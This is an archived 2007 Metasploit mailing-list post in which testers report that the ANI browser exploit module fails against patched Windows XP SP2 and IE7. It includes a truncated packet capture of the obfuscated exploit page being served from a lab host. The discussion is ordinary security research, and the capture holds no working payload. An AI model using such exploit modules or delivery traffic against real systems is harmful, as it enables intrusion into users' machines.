Metasploit mailing list archives

Metasploit vs ANI

From: saad at docisland.org (Saad Kadhi)
Date: Mon, 2 Apr 2007 13:58:30 +0200

On Apr 2, 2007, at 10:58 AM, Nicolas RUFF wrote:

I've just been testing ANI/HTTP payload against XPSP2 and Vista,
and the
Web page seems somewhat "corrupted". As a result, IE displays ASCII
characters without even crashing.

I cannot even see the "anih" header. The page might be GZIP'ed even if
default options are set to turn off all evasion techniques. What do
you
think ?

It looks like I have similar results with XPSP2 and IE7 with a
Windows Update run as of today Apr 2, 12:00 PM CEST.

Filtered Wireshark transcript below (non-printable characters
removed).

-----------
GET /lol HTTP/1.1
[...]

Here is mine:
---
GET /patch.html/
oeJxHVBAW2QFNlxVVEc1ldTJhFhZVErJ3lIwQtkFep9ggF90zQyD.tar?ZRpysSDj=3
HTTP/1.1
Accept: */*
Referer: http://10.1.1.13:8080/patch.html
Host: 10.1.1.13:8080
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: Apache
Connection: Keep-Alive

Lgxegjd</title></
head><body>zjOLdfLZLOCvJlIMkYspWM6Lrw32tY99mQmBfuSxkzhwrNDOzENXhNlvqN9ip
PI2GwEruvXoIyqEIMFj<div style='
[...]
---

Full transcript available on request.

Regards,
--
Saad Kadhi -- http://saad.docisland.org/
"True security is born from love alone" -- Antibalas